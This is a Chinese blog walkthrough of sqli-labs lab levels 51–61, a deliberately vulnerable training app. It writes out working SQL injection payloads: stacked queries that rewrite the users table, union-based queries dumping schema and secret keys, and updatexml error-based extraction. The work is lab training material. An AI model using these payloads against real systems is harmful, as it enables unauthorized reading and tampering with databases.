当前位置: 首页 > news >正文

sqli-labs-master/Less-51~Less-61

news 2025/8/11 11:58:36

Less-51

这一关通过查看源代码可知,这一关是字符型以分号的方式闭合的。

那我们构造语句

?sort=1';update users set username='ZZKK' where id=1 -- 1

发现插入数据成功。

Less-52

这一关仍然是堆叠注入,闭合方式位数字型

?sort=1;update users set username='ZZKK' where id=1 -- 1

堆叠注入攻击成功。

Less-53

这一关还是老样子。堆叠注入。

?sort=1';update users set username='ZKK' where id=1 -- 1

注意堆叠注入原理,是利用数据库支持多条 SQL 语句同时执行(通过分号分隔)的特性,在正常语句后追加恶意 SQL 语句实现攻击。

你可以构造任何的语句来攻击。

Less-54

重这一关开始他对我们的查询次数做了限制,这一关他要求我们10次查询爆出字段信息。

注意这个表和数据生成后,都是随机的。参考的我下面的语法时要注意

先判断闭合,先试一下单引号。

?id=-1') union select 1,2,3 and 1=('1

发现回显点也正常。

那接下来我们直接爆库。

?id=-1' union select 1,database(),3 and 1='1

然后爆表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 and 1='1

爆字段

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='v35v8dtr7b'),3 and 1='1

爆字段信息

?id=-1' union select 1,(select secret_V535 from kv3lrjc74u),3 and 1='1

然后下面填入我们刚才爆出的密钥

完成。

Less-55

这一关,还是判断闭合,老套路。试了一下,把次数试没了,重置数据库。。。。

还是查看源代码吧。

?id=1) union select 1,2,3--%20

回显点正常。不错,下面就参考上一关的语法。

Less-56

判断闭合方式,次数试没了就重置数据库

?id=-1') union select 1,2,3 and 1=('1

有回显点,下面我就不演示了,参考上面

Less-57

接着试闭合,双引号闭合。换汤不换药,秒了

?id=-1" union select 1,2,3 and 1="1

Less-58

这一关就和上面不一样了,这里只有5次机会了,尝试了一下发现没有回显,但是有sql语句报错回显。所以我们使用报错注入。

先爆库

?id=1'and updatexml(0x7e,concat(1,database()),0x7e)-- %20

再爆表

?id=1'and updatexml(0x7e,concat(1,(select table_name from information_schema.tables where table_schema='challenges')),0x7e)--%20

然后爆字段

?id=1'and updatexml(0x7e,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='cb3groiezl')),0x7e)--%20

然后爆字段信息

?id=1'and updatexml(0x7e,concat(1,(select secret_N6EC from cb3groiezl)),0x7e)-- %20

然后将查出来的密钥,填入下面即可。

完成。

Less-59

和上一关一样。数字型。

?id=1 and updatexml(0x7e,concat(1,database()),0x7e)-- %20

然后下面的步骤和之前一样。

Less-60

这一关仍然一样。双引号括号闭合

?id=1") and updatexml(0x7e,concat(1,database()),0x7e)-- %20

Less-61

这一关闭合方式为单引号括号括号。

?id=1')) and updatexml(0x7e,concat(1,database()),0x7e)-- %20

步骤还是跟上面一样。

http://www.dtcms.com/a/324953.html

相关文章:

  • 解读 GPT-5:从“博士级 AI 专家”能力到 OpenAI API Key 获取与实践(提示工程→性能调优全流程)
  • MySQL自增ID与UUID的区别及其在索引分裂中的表现与优化
  • W3D引擎游戏开发----从入门到精通【23】
  • 2013年考研数学(二)真题
  • A#语言详解
  • 相比于传统的全波分析,特征模分析具有哪些优点
  • vue如何监听localstorage
  • 博览会(树形DP)
  • 机器学习——标准化、归一化
  • Spring Boot 事务详解:原理与实操指南
  • AQS(AbstractQueuedSynchronizer)底层源码实现与设计思想
  • 第三章-提示词:从0到1,提示词实训全攻略,解锁大语言模型无限潜能(14/36)
  • MyBatis Mapper核心组件协作关系深度解析
  • Java条件判断与用户交互实战案例
  • 【经典算法】二叉树最小深度详解:递归解法与可视化分析
  • 深入解析C#并行编程:从并行循环到异步编程模式
  • PyCATIA深度解析:基于装配截面自动化创建参考几何平面群的专业方案
  • 锂电生产设备健康管理:基于预测性维护的智能化解决方案​
  • 【github.io静态网页 怎么使用 github.io 搭建一个简单的网页?】
  • Python与MySQL数据库交互实践:自动化数据插入系统
  • GPU版的Pytorch安装(Win11)
  • SpringBoot项目自定义静态资源映射规则
  • 【嵌入式】Linux的常用操作命令 (1)
  • SAP 121移动类型的说明
  • C野指针的概念与应对(源头、阻隔、定位)
  • STM32定时器与延时系统完整笔记
  • 【C#补全计划】万类之父中的方法
  • 使用单调栈解决力扣第42题--接雨水
  • 亚麻云之静态资源管家——S3存储服务实战
  • SSH远程连接TRAE时显示权限被拒绝检查方案